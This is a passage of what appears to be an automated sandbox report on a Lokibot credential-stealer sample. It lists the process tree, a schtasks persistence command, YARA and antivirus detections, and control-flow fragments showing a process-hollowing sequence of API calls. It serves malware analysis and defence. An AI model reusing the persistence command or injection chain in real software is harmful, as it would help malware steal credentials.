                          Start date:17/04/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:4
                          Start time:03:16:47
                          Start date:17/04/2024
                          Path:C:\Windows\SysWOW64\schtasks.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WiHDtnb" /XML "C:\Users\user\AppData\Local\Temp\tmpC9C3.tmp"
                          Imagebase:0xe50000
                          File size:187'904 bytes
                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:5
                          Start time:03:16:47
                          Start date:17/04/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:6
                          Start time:03:16:48
                          Start date:17/04/2024
                          Path:C:\Users\user\Desktop\gunzipped.exe
                          Wow64 process (32bit):false
                          Commandline:"C:\Users\user\Desktop\gunzipped.exe"
                          Imagebase:0xa0000
                          File size:553'984 bytes
                          MD5 hash:8864B52D242037414B7C4A230C390AB8
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          Target ID:7
                          Start time:03:16:48
                          Start date:17/04/2024
                          Path:C:\Users\user\Desktop\gunzipped.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\gunzipped.exe"
                          Imagebase:0x9e0000
                          File size:553'984 bytes
                          MD5 hash:8864B52D242037414B7C4A230C390AB8
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000007.00000002.3214154708.0000000001008000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                          Reputation:low
                          Has exited:false

                          Target ID:8
                          Start time:03:16:49
                          Start date:17/04/2024
                          Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                          Imagebase:0x7ff6ef0c0000
                          File size:496'640 bytes
                          MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                          Has elevated privileges:true
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:9
                          Start time:03:16:49
                          Start date:17/04/2024
                          Path:C:\Users\user\AppData\Roaming\WiHDtnb.exe
                          Wow64 process (32bit):true
                          Commandline:C:\Users\user\AppData\Roaming\WiHDtnb.exe
                          Imagebase:0x830000
                          File size:553'984 bytes
                          MD5 hash:8864B52D242037414B7C4A230C390AB8
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000009.00000002.2022645941.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000009.00000002.2022645941.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.2022645941.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000009.00000002.2022645941.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000009.00000002.2022645941.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000009.00000002.2022645941.0000000002C8F000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                          Antivirus matches:
                          • Detection: 100%, Joe Sandbox ML
                          • Detection: 18%, ReversingLabs
                          • Detection: 34%, Virustotal, Browse
                          Reputation:low
                          Has exited:true

                          Target ID:10
                          Start time:03:16:50
                          Start date:17/04/2024
                          Path:C:\Windows\SysWOW64\schtasks.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\WiHDtnb" /XML "C:\Users\user\AppData\Local\Temp\tmpD4BF.tmp"
                          Imagebase:0xe50000
                          File size:187'904 bytes
                          MD5 hash:48C2FE20575769DE916F48EF0676A965
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:11
                          Start time:03:16:50
                          Start date:17/04/2024
                          Path:C:\Windows\System32\conhost.exe
                          Wow64 process (32bit):false
                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          Imagebase:0x7ff6d64d0000
                          File size:862'208 bytes
                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Target ID:12
                          Start time:03:16:50
                          Start date:17/04/2024
                          Path:C:\Users\user\AppData\Roaming\WiHDtnb.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\AppData\Roaming\WiHDtnb.exe"
                          Imagebase:0x570000
                          File size:553'984 bytes
                          MD5 hash:8864B52D242037414B7C4A230C390AB8
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                          • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                          • Rule: Loki_1, Description: Loki Payload, Source: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                          • Rule: Lokibot, Description: detect Lokibot in memory, Source: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                          • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 0000000C.00000002.2001299767.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                          Reputation:low
                          Has exited:true

                          Reset < >

                            Execution Graph

                            Execution Coverage:11%
                            Dynamic/Decrypted Code Coverage:100%
                            Signature Coverage:0%
                            Total number of Nodes:111
                            Total number of Limit Nodes:6
                            execution_graph 18165 2514a30 18166 2514a39 18165->18166 18167 2514a3f 18166->18167 18169 2514b28 18166->18169 18170 2514b4d 18169->18170 18174 2514c38 18170->18174 18178 2514c28 18170->18178 18176 2514c5f 18174->18176 18175 2514d3c 18175->18175 18176->18175 18182 2514864 18176->18182 18180 2514c5f 18178->18180 18179 2514d3c 18179->18179 18180->18179 18181 2514864 CreateActCtxA 18180->18181 18181->18179 18183 2515cc8 CreateActCtxA 18182->18183 18185 2515d8b 18183->18185 18186 52fb948 18187 52fbad3 18186->18187 18188 52fb96e 18186->18188 18188->18187 18190 52f9948 18188->18190 18191 52fbbc8 PostMessageW 18190->18191 18192 52fbc34 18191->18192 18192->18188 18193 52f7b65 18194 52f7bbb 18193->18194 18195 52f7b7c 18193->18195 18200 52fa716 18195->18200 18212 52fa6b0 18195->18212 18223 52fa6a1 18195->18223 18196 52f7d25 18201 52fa6a4 18200->18201 18203 52fa719 18200->18203 18202 52fa6d2 18201->18202 18234 52fac96 18201->18234 18239 52fab16 18201->18239 18244 52fac27 18201->18244 18249 52fad59 18201->18249 18254 52fadf9 18201->18254 18258 52fb000 18201->18258 18264 52fb530 18201->18264 18268 52fb2c5 18201->18268 18202->18196 18203->18196 18213 52fa6ca 18212->18213 18214 52fa6d2 18213->18214 18215 52fadf9 2 API calls 18213->18215 18216 52fad59 2 API calls 18213->18216 18217 52fac27 2 API calls 18213->18217 18218 52fab16 2 API calls 18213->18218 18219 52fac96 2 API calls 18213->18219 18220 52fb2c5 2 API calls 18213->18220 18221 52fb530 2 API calls 18213->18221 18222 52fb000 2 API calls 18213->18222 18214->18196 18215->18214 18216->18214 18217->18214 18218->18214 18219->18214 18220->18214 18221->18214 18222->18214 18224 52fa6ca 18223->18224 18225 52fa6d2 18224->18225 18226 52fadf9 2 API calls 18224->18226 18227 52fad59 2 API calls 18224->18227 18228 52fac27 2 API calls 18224->18228 18229 52fab16 2 API calls 18224->18229 18230 52fac96 2 API calls 18224->18230 18231 52fb2c5 2 API calls 18224->18231 18232 52fb530 2 API calls 18224->18232 18233 52fb000 2 API calls 18224->18233 18225->18196 18226->18225 18227->18225 18228->18225 18229->18225 18230->18225 18231->18225 18232->18225 18233->18225 18235 52fb1c1 18234->18235 18272 52f7318 18235->18272 18276 52f7310 18235->18276 18236 52fb1dc 18240 52fab1c 18239->18240 18280 52f772e 18240->18280 18284 52f7738 18240->18284 18245 52fac37 18244->18245 18288 52f74a8 18245->18288 18292 52f74b0 18245->18292 18246 52fb32d 18246->18202 18250 52fad5f 18249->18250 18252 52f74a8 WriteProcessMemory 18250->18252 18253 52f74b0 WriteProcessMemory 18250->18253 18251 52fad91 18252->18251 18253->18251 18296 52f73e8 18254->18296 18300 52f73f0 18254->18300 18255 52fae17 18259 52fb00d 18258->18259 18260 52fad70 18258->18260 18262 52f74a8 WriteProcessMemory 18260->18262 18263 52f74b0 WriteProcessMemory 18260->18263 18261 52fad91 18262->18261 18263->18261 18266 52f74a8 WriteProcessMemory 18264->18266 18267 52f74b0 WriteProcessMemory 18264->18267 18265 52fb554 18266->18265 18267->18265 18304 52f759a 18268->18304 18308 52f75a0 18268->18308 18269 52fb2e7 18273 52f735d Wow64SetThreadContext 18272->18273 18275 52f73a5 18273->18275 18275->18236 18277 52f735d Wow64SetThreadContext 18276->18277 18279 52f73a5 18277->18279 18279->18236 18281 52f7738 CreateProcessA 18280->18281 18283 52f7983 18281->18283 18285 52f77c1 CreateProcessA 18284->18285 18287 52f7983 18285->18287 18289 52f74f8 WriteProcessMemory 18288->18289 18291 52f754f 18289->18291 18291->18246 18293 52f74f8 WriteProcessMemory 18292->18293 18295 52f754f 18293->18295 18295->18246 18297 52f7430 VirtualAllocEx 18296->18297 18299 52f746d 18297->18299 18299->18255 18301 52f7430 VirtualAllocEx 18300->18301 18303 52f746d 18301->18303 18303->18255 18305 52f75eb ReadProcessMemory 18304->18305 18307 52f762f 18305->18307 18307->18269 18309 52f75eb ReadProcessMemory 18308->18309 18311 52f762f 18309->18311 18311->18269 18312 52f6e30 18313 52f6e70 ResumeThread 18312->18313 18315 52f6ea1 18313->18315
                            Memory Dump Source
                            • Source File: 00000000.00000002.1996779955.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_52f0000_gunzipped.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 42d28e4834cd5e643e465a5987048f1af1a940c94ef46f788c901cfec8f41382
                            • Instruction ID: a7c7fabfbc16ba2b72535056e151fb463d972338426bad4c257a720cbd078fb0
                            • Opcode Fuzzy Hash: 42d28e4834cd5e643e465a5987048f1af1a940c94ef46f788c901cfec8f41382
                            • Instruction Fuzzy Hash: D8229C31B192098FDB19DB68D554BAEB7F6BF89704F144469E60AEB3A0CB34ED01CB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.1996779955.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_52f0000_gunzipped.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 861ee8a39f1f15c9920273848bfafb160d6e2ba1c9c061815b4722b7334400d3
                            • Instruction ID: 8702a5036382d6698ef6beca07cea7c92051cb0c0b61a6506806cb87c6fa21ff
                            • Opcode Fuzzy Hash: 861ee8a39f1f15c9920273848bfafb160d6e2ba1c9c061815b4722b7334400d3
                            • Instruction Fuzzy Hash: B4A00214FBE00CD095109D10B0155F5C17F4E1B210F543135471E3341206D4D012034C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 839 52f772e-52f77cd 842 52f77cf-52f77d9 839->842 843 52f7806-52f7826 839->843 842->843 844 52f77db-52f77dd 842->844 850 52f785f-52f788e 843->850 851 52f7828-52f7832 843->851 845 52f77df-52f77e9 844->845 846 52f7800-52f7803 844->846 848 52f77ed-52f77fc 845->848 849 52f77eb 845->849 846->843 848->848 852 52f77fe 848->852 849->848 857 52f78c7-52f7981 CreateProcessA 850->857 858 52f7890-52f789a 850->858 851->850 853 52f7834-52f7836 851->853 852->846 855 52f7859-52f785c 853->855 856 52f7838-52f7842 853->856 855->850 859 52f7846-52f7855 856->859 860 52f7844 856->860 871 52f798a-52f7a10 857->871 872 52f7983-52f7989 857->872 858->857 861 52f789c-52f789e 858->861 859->859 862 52f7857 859->862 860->859 863 52f78c1-52f78c4 861->863 864 52f78a0-52f78aa 861->864 862->855 863->857 866 52f78ae-52f78bd 864->866 867 52f78ac 864->867 866->866 868 52f78bf 866->868 867->866 868->863 882 52f7a12-52f7a16 871->882 883 52f7a20-52f7a24 871->883 872->871 882->883 884 52f7a18 882->884 885 52f7a26-52f7a2a 883->885 886 52f7a34-52f7a38 883->886 884->883 885->886 887 52f7a2c 885->887 888 52f7a3a-52f7a3e 886->888 889 52f7a48-52f7a4c 886->889 887->886 888->889 892 52f7a40 888->892 890 52f7a5e-52f7a65 889->890 891 52f7a4e-52f7a54 889->891 893 52f7a7c 890->893 894 52f7a67-52f7a76 890->894 891->890 892->889 896 52f7a7d 893->896 894->893 896->896
                            APIs
                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 052F796E
                            Memory Dump Source
                            • Source File: 00000000.00000002.1996779955.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_52f0000_gunzipped.jbxd
                            Similarity
                            • API ID: CreateProcess
                            • String ID:
                            • API String ID: 963392458-0
                            • Opcode ID: 3c490ddc7a839c76bb2d81b51fc16f8c787af896a2dbf0e9763f788156cce9cd
                            • Instruction ID: 43a51bfae9f367d0d7bcd05984b83a7ab92281a1349180ef4c7e4e2b5ab1e782
                            • Opcode Fuzzy Hash: 3c490ddc7a839c76bb2d81b51fc16f8c787af896a2dbf0e9763f788156cce9cd
                            • Instruction Fuzzy Hash: 79915971D1021A9FDB10CF68D880BEDFBB2FF48314F1885AAD909A7250DB75A985CF91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 897 52f7738-52f77cd 899 52f77cf-52f77d9 897->899 900 52f7806-52f7826 897->900 899->900 901 52f77db-52f77dd 899->901 907 52f785f-52f788e 900->907 908 52f7828-52f7832 900->908 902 52f77df-52f77e9 901->902 903 52f7800-52f7803 901->903 905 52f77ed-52f77fc 902->905 906 52f77eb 902->906 903->900 905->905 909 52f77fe 905->909 906->905 914 52f78c7-52f7981 CreateProcessA 907->914 915 52f7890-52f789a 907->915 908->907 910 52f7834-52f7836 908->910 909->903 912 52f7859-52f785c 910->912 913 52f7838-52f7842 910->913 912->907 916 52f7846-52f7855 913->916 917 52f7844 913->917 928 52f798a-52f7a10 914->928 929 52f7983-52f7989 914->929 915->914 918 52f789c-52f789e 915->918 916->916 919 52f7857 916->919 917->916 920 52f78c1-52f78c4 918->920 921 52f78a0-52f78aa 918->921 919->912 920->914 923 52f78ae-52f78bd 921->923 924 52f78ac 921->924 923->923 925 52f78bf 923->925 924->923 925->920 939 52f7a12-52f7a16 928->939 940 52f7a20-52f7a24 928->940 929->928 939->940 941 52f7a18 939->941 942 52f7a26-52f7a2a 940->942 943 52f7a34-52f7a38 940->943 941->940 942->943 944 52f7a2c 942->944 945 52f7a3a-52f7a3e 943->945 946 52f7a48-52f7a4c 943->946 944->943 945->946 949 52f7a40 945->949 947 52f7a5e-52f7a65 946->947 948 52f7a4e-52f7a54 946->948 950 52f7a7c 947->950 951 52f7a67-52f7a76 947->951 948->947 949->946 953 52f7a7d 950->953 951->950 953->953
                            APIs
                            • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 052F796E
                            Memory Dump Source
                            • Source File: 00000000.00000002.1996779955.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_52f0000_gunzipped.jbxd
                            Similarity
                            • API ID: CreateProcess
                            • String ID:
                            • API String ID: 963392458-0
                            • Opcode ID: e5b91de2ff0f8b50e3ada8100f48b202a9e4c2f4f023d79cc53a65c2715e1a8e
                            • Instruction ID: 8c5bf069199f0e6c007791ef3b4087fc608a6c19af681282808c1c892ecdcddf
                            • Opcode Fuzzy Hash: e5b91de2ff0f8b50e3ada8100f48b202a9e4c2f4f023d79cc53a65c2715e1a8e
                            • Instruction Fuzzy Hash: 3B916A71D1021A8FDB10CF68D840BEDFBB2FF48314F1885AAD909A7250DB75A985CF91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 954 2514864-2515d89 CreateActCtxA 958 2515d92-2515dec 954->958 959 2515d8b-2515d91 954->959 967 2515dfb-2515dff 958->967 968 2515dee-2515df1 958->968 959->958 969 2515e01-2515e0d 967->969 970 2515e10-2515e40 967->970 968->967 969->970 974 2515df2 970->974 975 2515e42-2515e47 970->975 978 2515e61-2515e63 974->978 979 2515df4-2515df7 974->979 976 2515eb9-2515ec4 975->976 977 2515e5f 975->977 977->976 978->976 979->977 981 2515dfa 979->981 981->967
                            APIs
                            • CreateActCtxA.KERNEL32(?), ref: 02515D79
                            Memory Dump Source
                            • Source File: 00000000.00000002.1993490409.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2510000_gunzipped.jbxd
                            Similarity
                            • API ID: Create
                            • String ID:
                            • API String ID: 2289755597-0
                            • Opcode ID: dc29bd8cec0b825dd65e4a0d1b630b9ab87c0d64d4e8e4dea8fa159f202cebcf
                            • Instruction ID: c4cb02ab818cc71a3cf6f98dac0324f2bc897c8c63a159d4e768c3b8bcd6e081
                            • Opcode Fuzzy Hash: dc29bd8cec0b825dd65e4a0d1b630b9ab87c0d64d4e8e4dea8fa159f202cebcf
                            • Instruction Fuzzy Hash: 5641F2B0C00719CBEB24DFA9C844BDEBBB5BF48304F20806AD418AB254DB756946CF91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 982 2515cbc-2515d3c 984 2515d3f-2515d89 CreateActCtxA 982->984 986 2515d92-2515dec 984->986 987 2515d8b-2515d91 984->987 995 2515dfb-2515dff 986->995 996 2515dee-2515df1 986->996 987->986 997 2515e01-2515e0d 995->997 998 2515e10-2515e40 995->998 996->995 997->998 1002 2515df2 998->1002 1003 2515e42-2515e47 998->1003 1006 2515e61-2515e63 1002->1006 1007 2515df4-2515df5 1002->1007 1004 2515eb9-2515ec4 1003->1004 1005 2515e5f 1003->1005 1005->1004 1006->1004 1008 2515df7 1007->1008 1008->1005 1009 2515dfa 1008->1009 1009->995
                            APIs
                            • CreateActCtxA.KERNEL32(?), ref: 02515D79
                            Memory Dump Source
                            • Source File: 00000000.00000002.1993490409.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2510000_gunzipped.jbxd
                            Similarity
                            • API ID: Create
                            • String ID:
                            • API String ID: 2289755597-0
                            • Opcode ID: 98d4eafd50e73b994437a9477b1ed1951cecfbde4870a881164083bdd4afd9dc
                            • Instruction ID: 7388a7169c58108997a5c2831c17626db356884323e41c3a82b1dc623a3699a7
                            • Opcode Fuzzy Hash: 98d4eafd50e73b994437a9477b1ed1951cecfbde4870a881164083bdd4afd9dc
                            • Instruction Fuzzy Hash: A741F2B0C00B19CFEB24DFA9C8847DDBBB5BF48304F20806AD419AB254DB756946CF91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1010 2515e34-2515e40 1011 2515df2 1010->1011 1012 2515e42-2515e47 1010->1012 1015 2515e61-2515e63 1011->1015 1016 2515df4-2515df5 1011->1016 1013 2515eb9-2515ec4 1012->1013 1014 2515e5f 1012->1014 1014->1013 1015->1013 1017 2515df7 1016->1017 1017->1014 1018 2515dfa 1017->1018 1019 2515dfb-2515dff 1018->1019 1020 2515e01-2515e0d 1019->1020 1021 2515e10-2515e11 1019->1021 1020->1021 1021->1010
                            Memory Dump Source
                            • Source File: 00000000.00000002.1993490409.0000000002510000.00000040.00000800.00020000.00000000.sdmp, Offset: 02510000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_2510000_gunzipped.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: da20d07295e5ca0a7819e87919a57c441b33e0cb47144db58d588e9b943c8e1b
                            • Instruction ID: bfb242fe1a0a9c0004e2fc85ce840a0241e58c9dcfa9747060d938eab0a4b83c
                            • Opcode Fuzzy Hash: da20d07295e5ca0a7819e87919a57c441b33e0cb47144db58d588e9b943c8e1b
                            • Instruction Fuzzy Hash: F131EFB0805649CFEB15CFA8C4887EDBFB0BF86308F94418AC055AB265E779990ACF55
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1024 52f74a8-52f74fe 1026 52f750e-52f754d WriteProcessMemory 1024->1026 1027 52f7500-52f750c 1024->1027 1029 52f754f-52f7555 1026->1029 1030 52f7556-52f7586 1026->1030 1027->1026 1029->1030
                            APIs
                            • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 052F7540
                            Memory Dump Source
                            • Source File: 00000000.00000002.1996779955.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_52f0000_gunzipped.jbxd
                            Similarity
                            • API ID: MemoryProcessWrite
                            • String ID:
                            • API String ID: 3559483778-0
                            • Opcode ID: 0319a0b867235a65cba17ed62eff48ac575a152485c0d19f74b9a5dc437b03ad
                            • Instruction ID: 302abdaa227e80b75b7d0ec5e28334e3046d34d153b1dde50c81bcd43fef1f66
                            • Opcode Fuzzy Hash: 0319a0b867235a65cba17ed62eff48ac575a152485c0d19f74b9a5dc437b03ad
                            • Instruction Fuzzy Hash: D72127B5D003599FCB10DFA9C985BEEBBF5FF48310F14842AEA59A7240D7789544CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1034 52f74b0-52f74fe 1036 52f750e-52f754d WriteProcessMemory 1034->1036 1037 52f7500-52f750c 1034->1037 1039 52f754f-52f7555 1036->1039 1040 52f7556-52f7586 1036->1040 1037->1036 1039->1040
                            APIs
                            • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 052F7540
                            Memory Dump Source
                            • Source File: 00000000.00000002.1996779955.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_52f0000_gunzipped.jbxd
                            Similarity
                            • API ID: MemoryProcessWrite
                            • String ID:
                            • API String ID: 3559483778-0
                            • Opcode ID: 248a0961f8352528c6fc796e86f29f234214fa435f286e014e6e1f7d560fb6f0
                            • Instruction ID: 36abfe010003e1dccb19299d3e5fde9752dae7917e2ba8f8b088cfaf119bf60b
                            • Opcode Fuzzy Hash: 248a0961f8352528c6fc796e86f29f234214fa435f286e014e6e1f7d560fb6f0
                            • Instruction Fuzzy Hash: 382139B19003599FCB10DFA9C885BEEFBF5FF48310F148429EA19A7240C7789944CBA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 052F7620
                            Memory Dump Source
                            • Source File: 00000000.00000002.1996779955.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_52f0000_gunzipped.jbxd
                            Similarity
                            • API ID: MemoryProcessRead
                            • String ID:
                            • API String ID: 1726664587-0
                            • Opcode ID: 33cde09d66592c846cba9b94fcdc34a0868ef31316cb71368e4015b023bf5f68
                            • Instruction ID: 6b60245a9a3ea9a58105c165057a2daf408d3e33879063a002678402fe0bd4ab
                            • Opcode Fuzzy Hash: 33cde09d66592c846cba9b94fcdc34a0868ef31316cb71368e4015b023bf5f68
                            • Instruction Fuzzy Hash: 612138B1C003499FCB10DFAAC880AEEFBF5FF48310F10842AE519A7240C7789940CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1054 52f7318-52f7363 1056 52f7365-52f7371 1054->1056 1057 52f7373-52f73a3 Wow64SetThreadContext 1054->1057 1056->1057 1059 52f73ac-52f73dc 1057->1059 1060 52f73a5-52f73ab 1057->1060 1060->1059
                            APIs
                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 052F7396
                            Memory Dump Source
                            • Source File: 00000000.00000002.1996779955.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_52f0000_gunzipped.jbxd
                            Similarity
                            • API ID: ContextThreadWow64
                            • String ID:
                            • API String ID: 983334009-0
                            • Opcode ID: 6849418cb482ce31fc009ded36a38e08ff81910169a3ec1fd96865c59dc7a684
                            • Instruction ID: af782a4cb0f5cb16e9b47779f06149419b063cbbe20d0c55481f1d8e2e0f3513
                            • Opcode Fuzzy Hash: 6849418cb482ce31fc009ded36a38e08ff81910169a3ec1fd96865c59dc7a684
                            • Instruction Fuzzy Hash: F32137B19002099FDB14DFAAC4857EEFBF5FF48314F148429D959A7240CB789945CBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1044 52f7310-52f7363 1046 52f7365-52f7371 1044->1046 1047 52f7373-52f73a3 Wow64SetThreadContext 1044->1047 1046->1047 1049 52f73ac-52f73dc 1047->1049 1050 52f73a5-52f73ab 1047->1050 1050->1049
                            APIs
                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 052F7396
                            Memory Dump Source
                            • Source File: 00000000.00000002.1996779955.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_52f0000_gunzipped.jbxd
                            Similarity
                            • API ID: ContextThreadWow64
                            • String ID:
                            • API String ID: 983334009-0
                            • Opcode ID: b021c797f4353537bc69d9c3bc22c661239689048f694941645f3d771a3155bd
                            • Instruction ID: b44d86d961a0defd002a3c8954a9b8a9234677976c75ade3b0d2267c995c2c6a
                            • Opcode Fuzzy Hash: b021c797f4353537bc69d9c3bc22c661239689048f694941645f3d771a3155bd
                            • Instruction Fuzzy Hash: 7F2154B1D002098FDB14DFAAC9857EEBBF4FF48310F14842AD959A7240DB789945CFA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 052F7620
                            Memory Dump Source
                            • Source File: 00000000.00000002.1996779955.00000000052F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 052F0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_52f0000_gunzipped.jbxd
                            Similarity
                            • API ID: MemoryProcessRead
                            • String ID:
                            • API String ID: 1726664587-0
